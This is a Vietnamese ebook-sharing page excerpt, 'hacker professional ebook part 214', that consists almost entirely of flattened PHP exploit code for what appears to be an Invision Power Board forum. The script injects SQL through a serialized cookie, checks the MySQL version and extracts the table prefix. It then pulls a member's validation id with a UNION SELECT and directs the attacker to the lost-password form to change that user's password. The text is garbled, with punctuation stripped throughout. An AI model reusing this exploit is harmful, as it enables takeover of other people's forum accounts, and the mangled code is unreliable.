Tham khảo tài liệu 'hacker professional ebook part 214', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | Redirect to the main page cook getcookiee result foreach cook as k v cookie k v reffer url echo Going to Control Panel. url host. act UserCP CODE 00 reffer agent result querry url agent proxy reffer cookie_file_path Go te the control panel cook getcookiee result foreach cook as k v cookie k v echo Get table prefix. arr topic 1111111111 arr -1 andd topic cookie_base foreach cookie as k v cookie_base. k. . v. cookie_add cookie_base. cook_name. .urlencode serialize arr unset arr result querry url agent proxy reffer cookie_file_path cookie_add if strstr result Error echo error. Target seems not vuln exit pref ExtractString result SELECT FROM topics echo done prefix . pref. n al echo Checking Mysql version. targval explode . target arr topic 1111111111 arr -1 and @@version 4 topic cookie_add cookie_base. . cook_name. .urlencode serialize arr unset arr result querry url agent proxy reffer cookie_file_path cookie_add if strstr result showtopic . target echo done Mysql ver 4 -GOOD n else echo done Mysql ver 4. We can use only dos n exit echo Exploiting. sent 61 3A 32 3A 7B 73 3A if ver 1 exp - 999 UNION SELECT 0 vid open 0 1 1132440935 1 11132440935 0 null null 0 0 2 2 1 0 0 0 0 0 1 0 0 0 0 0 0 from . pref. validating where member_id . target. LIMIT 1 else exp - 999 UNION SELECT 1 vid open 0 1 1140775688 1 1140775688 0 @@version 4 4 4 4 4 4 4 4 4 4 4 4 4 from . pref. validating where member_id . target. arr topic 1111111111 arr exp topic cookie_add cookie_base. . cook_name. .urlencode serialize arr unset arr result querry url agent proxy reffer cookie_file_path cookie_add if strstr result different number of columns echo done n vid substr result strpos result a span -32 32 echo Done nGoto url . host. act Reg CODE lostpassform uid . target. aid . vid. and change user password n echo result exit else echo bad Can t find number of colums n echo Checking Mysql version 2. targval explode . target arr topic 1111111111 arr -1 and @@version topic .